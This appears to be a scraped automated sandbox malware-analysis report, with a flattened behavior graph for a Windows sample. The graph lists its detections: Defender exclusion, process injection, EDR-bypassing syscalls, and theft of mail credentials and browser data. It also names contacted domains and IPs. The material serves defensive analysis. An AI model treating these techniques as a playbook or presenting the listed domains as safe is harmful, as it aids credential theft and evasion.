                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1633494 Sample: Zjf9D3oDifslon7.bat.exe Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 37 www.quantumxr.xyz 2->37 39 www.lingkungan.xyz 2->39 41 17 other IPs or domains 2->41 49 Antivirus detection for URL or domain 2->49 51 Antivirus / Scanner detection for submitted sample 2->51 53 Multi AV Scanner detection for submitted file 2->53 57 5 other signatures 2->57 10 Zjf9D3oDifslon7.bat.exe 4 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 39->55 process4 file5 35 C:\Users\user\...\Zjf9D3oDifslon7.bat.exe.log, ASCII 10->35 dropped 69 Adds a directory exclusion to Windows Defender 10->69 71 Injects a PE file into a foreign processes 10->71 14 Zjf9D3oDifslon7.bat.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 14->73 19 nS7xrGJCV5KYH1dhdb.exe 14->19 injected 75 Loading BitLocker PowerShell Module 17->75 22 WmiPrvSE.exe 17->22         started        24 conhost.exe 17->24         started        process9 signatures10 59 Found direct / indirect Syscall (likely to bypass EDR) 19->59 26 help.exe 13 19->26         started        process11 signatures12 61 Tries to steal Mail credentials (via file / registry access) 26->61 63 Tries to harvest and steal browser information (history, passwords, etc) 26->63 65 Modifies the context of a thread in another process (thread injection) 26->65 67 3 other signatures 26->67 29 nS7xrGJCV5KYH1dhdb.exe 26->29 injected 33 firefox.exe 26->33         started        process13 dnsIp14 43 www.lingkungan.xyz 13.248.169.48, 49697, 49698, 49700 AMAZON-02US United States 29->43 45 www.klass.team 77.222.42.122, 49748, 49749, 49750 SWEB-ASRU Russian Federation 29->45 47 11 other IPs or domains 29->47 77 Found direct / indirect Syscall (likely to bypass EDR) 29->77 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.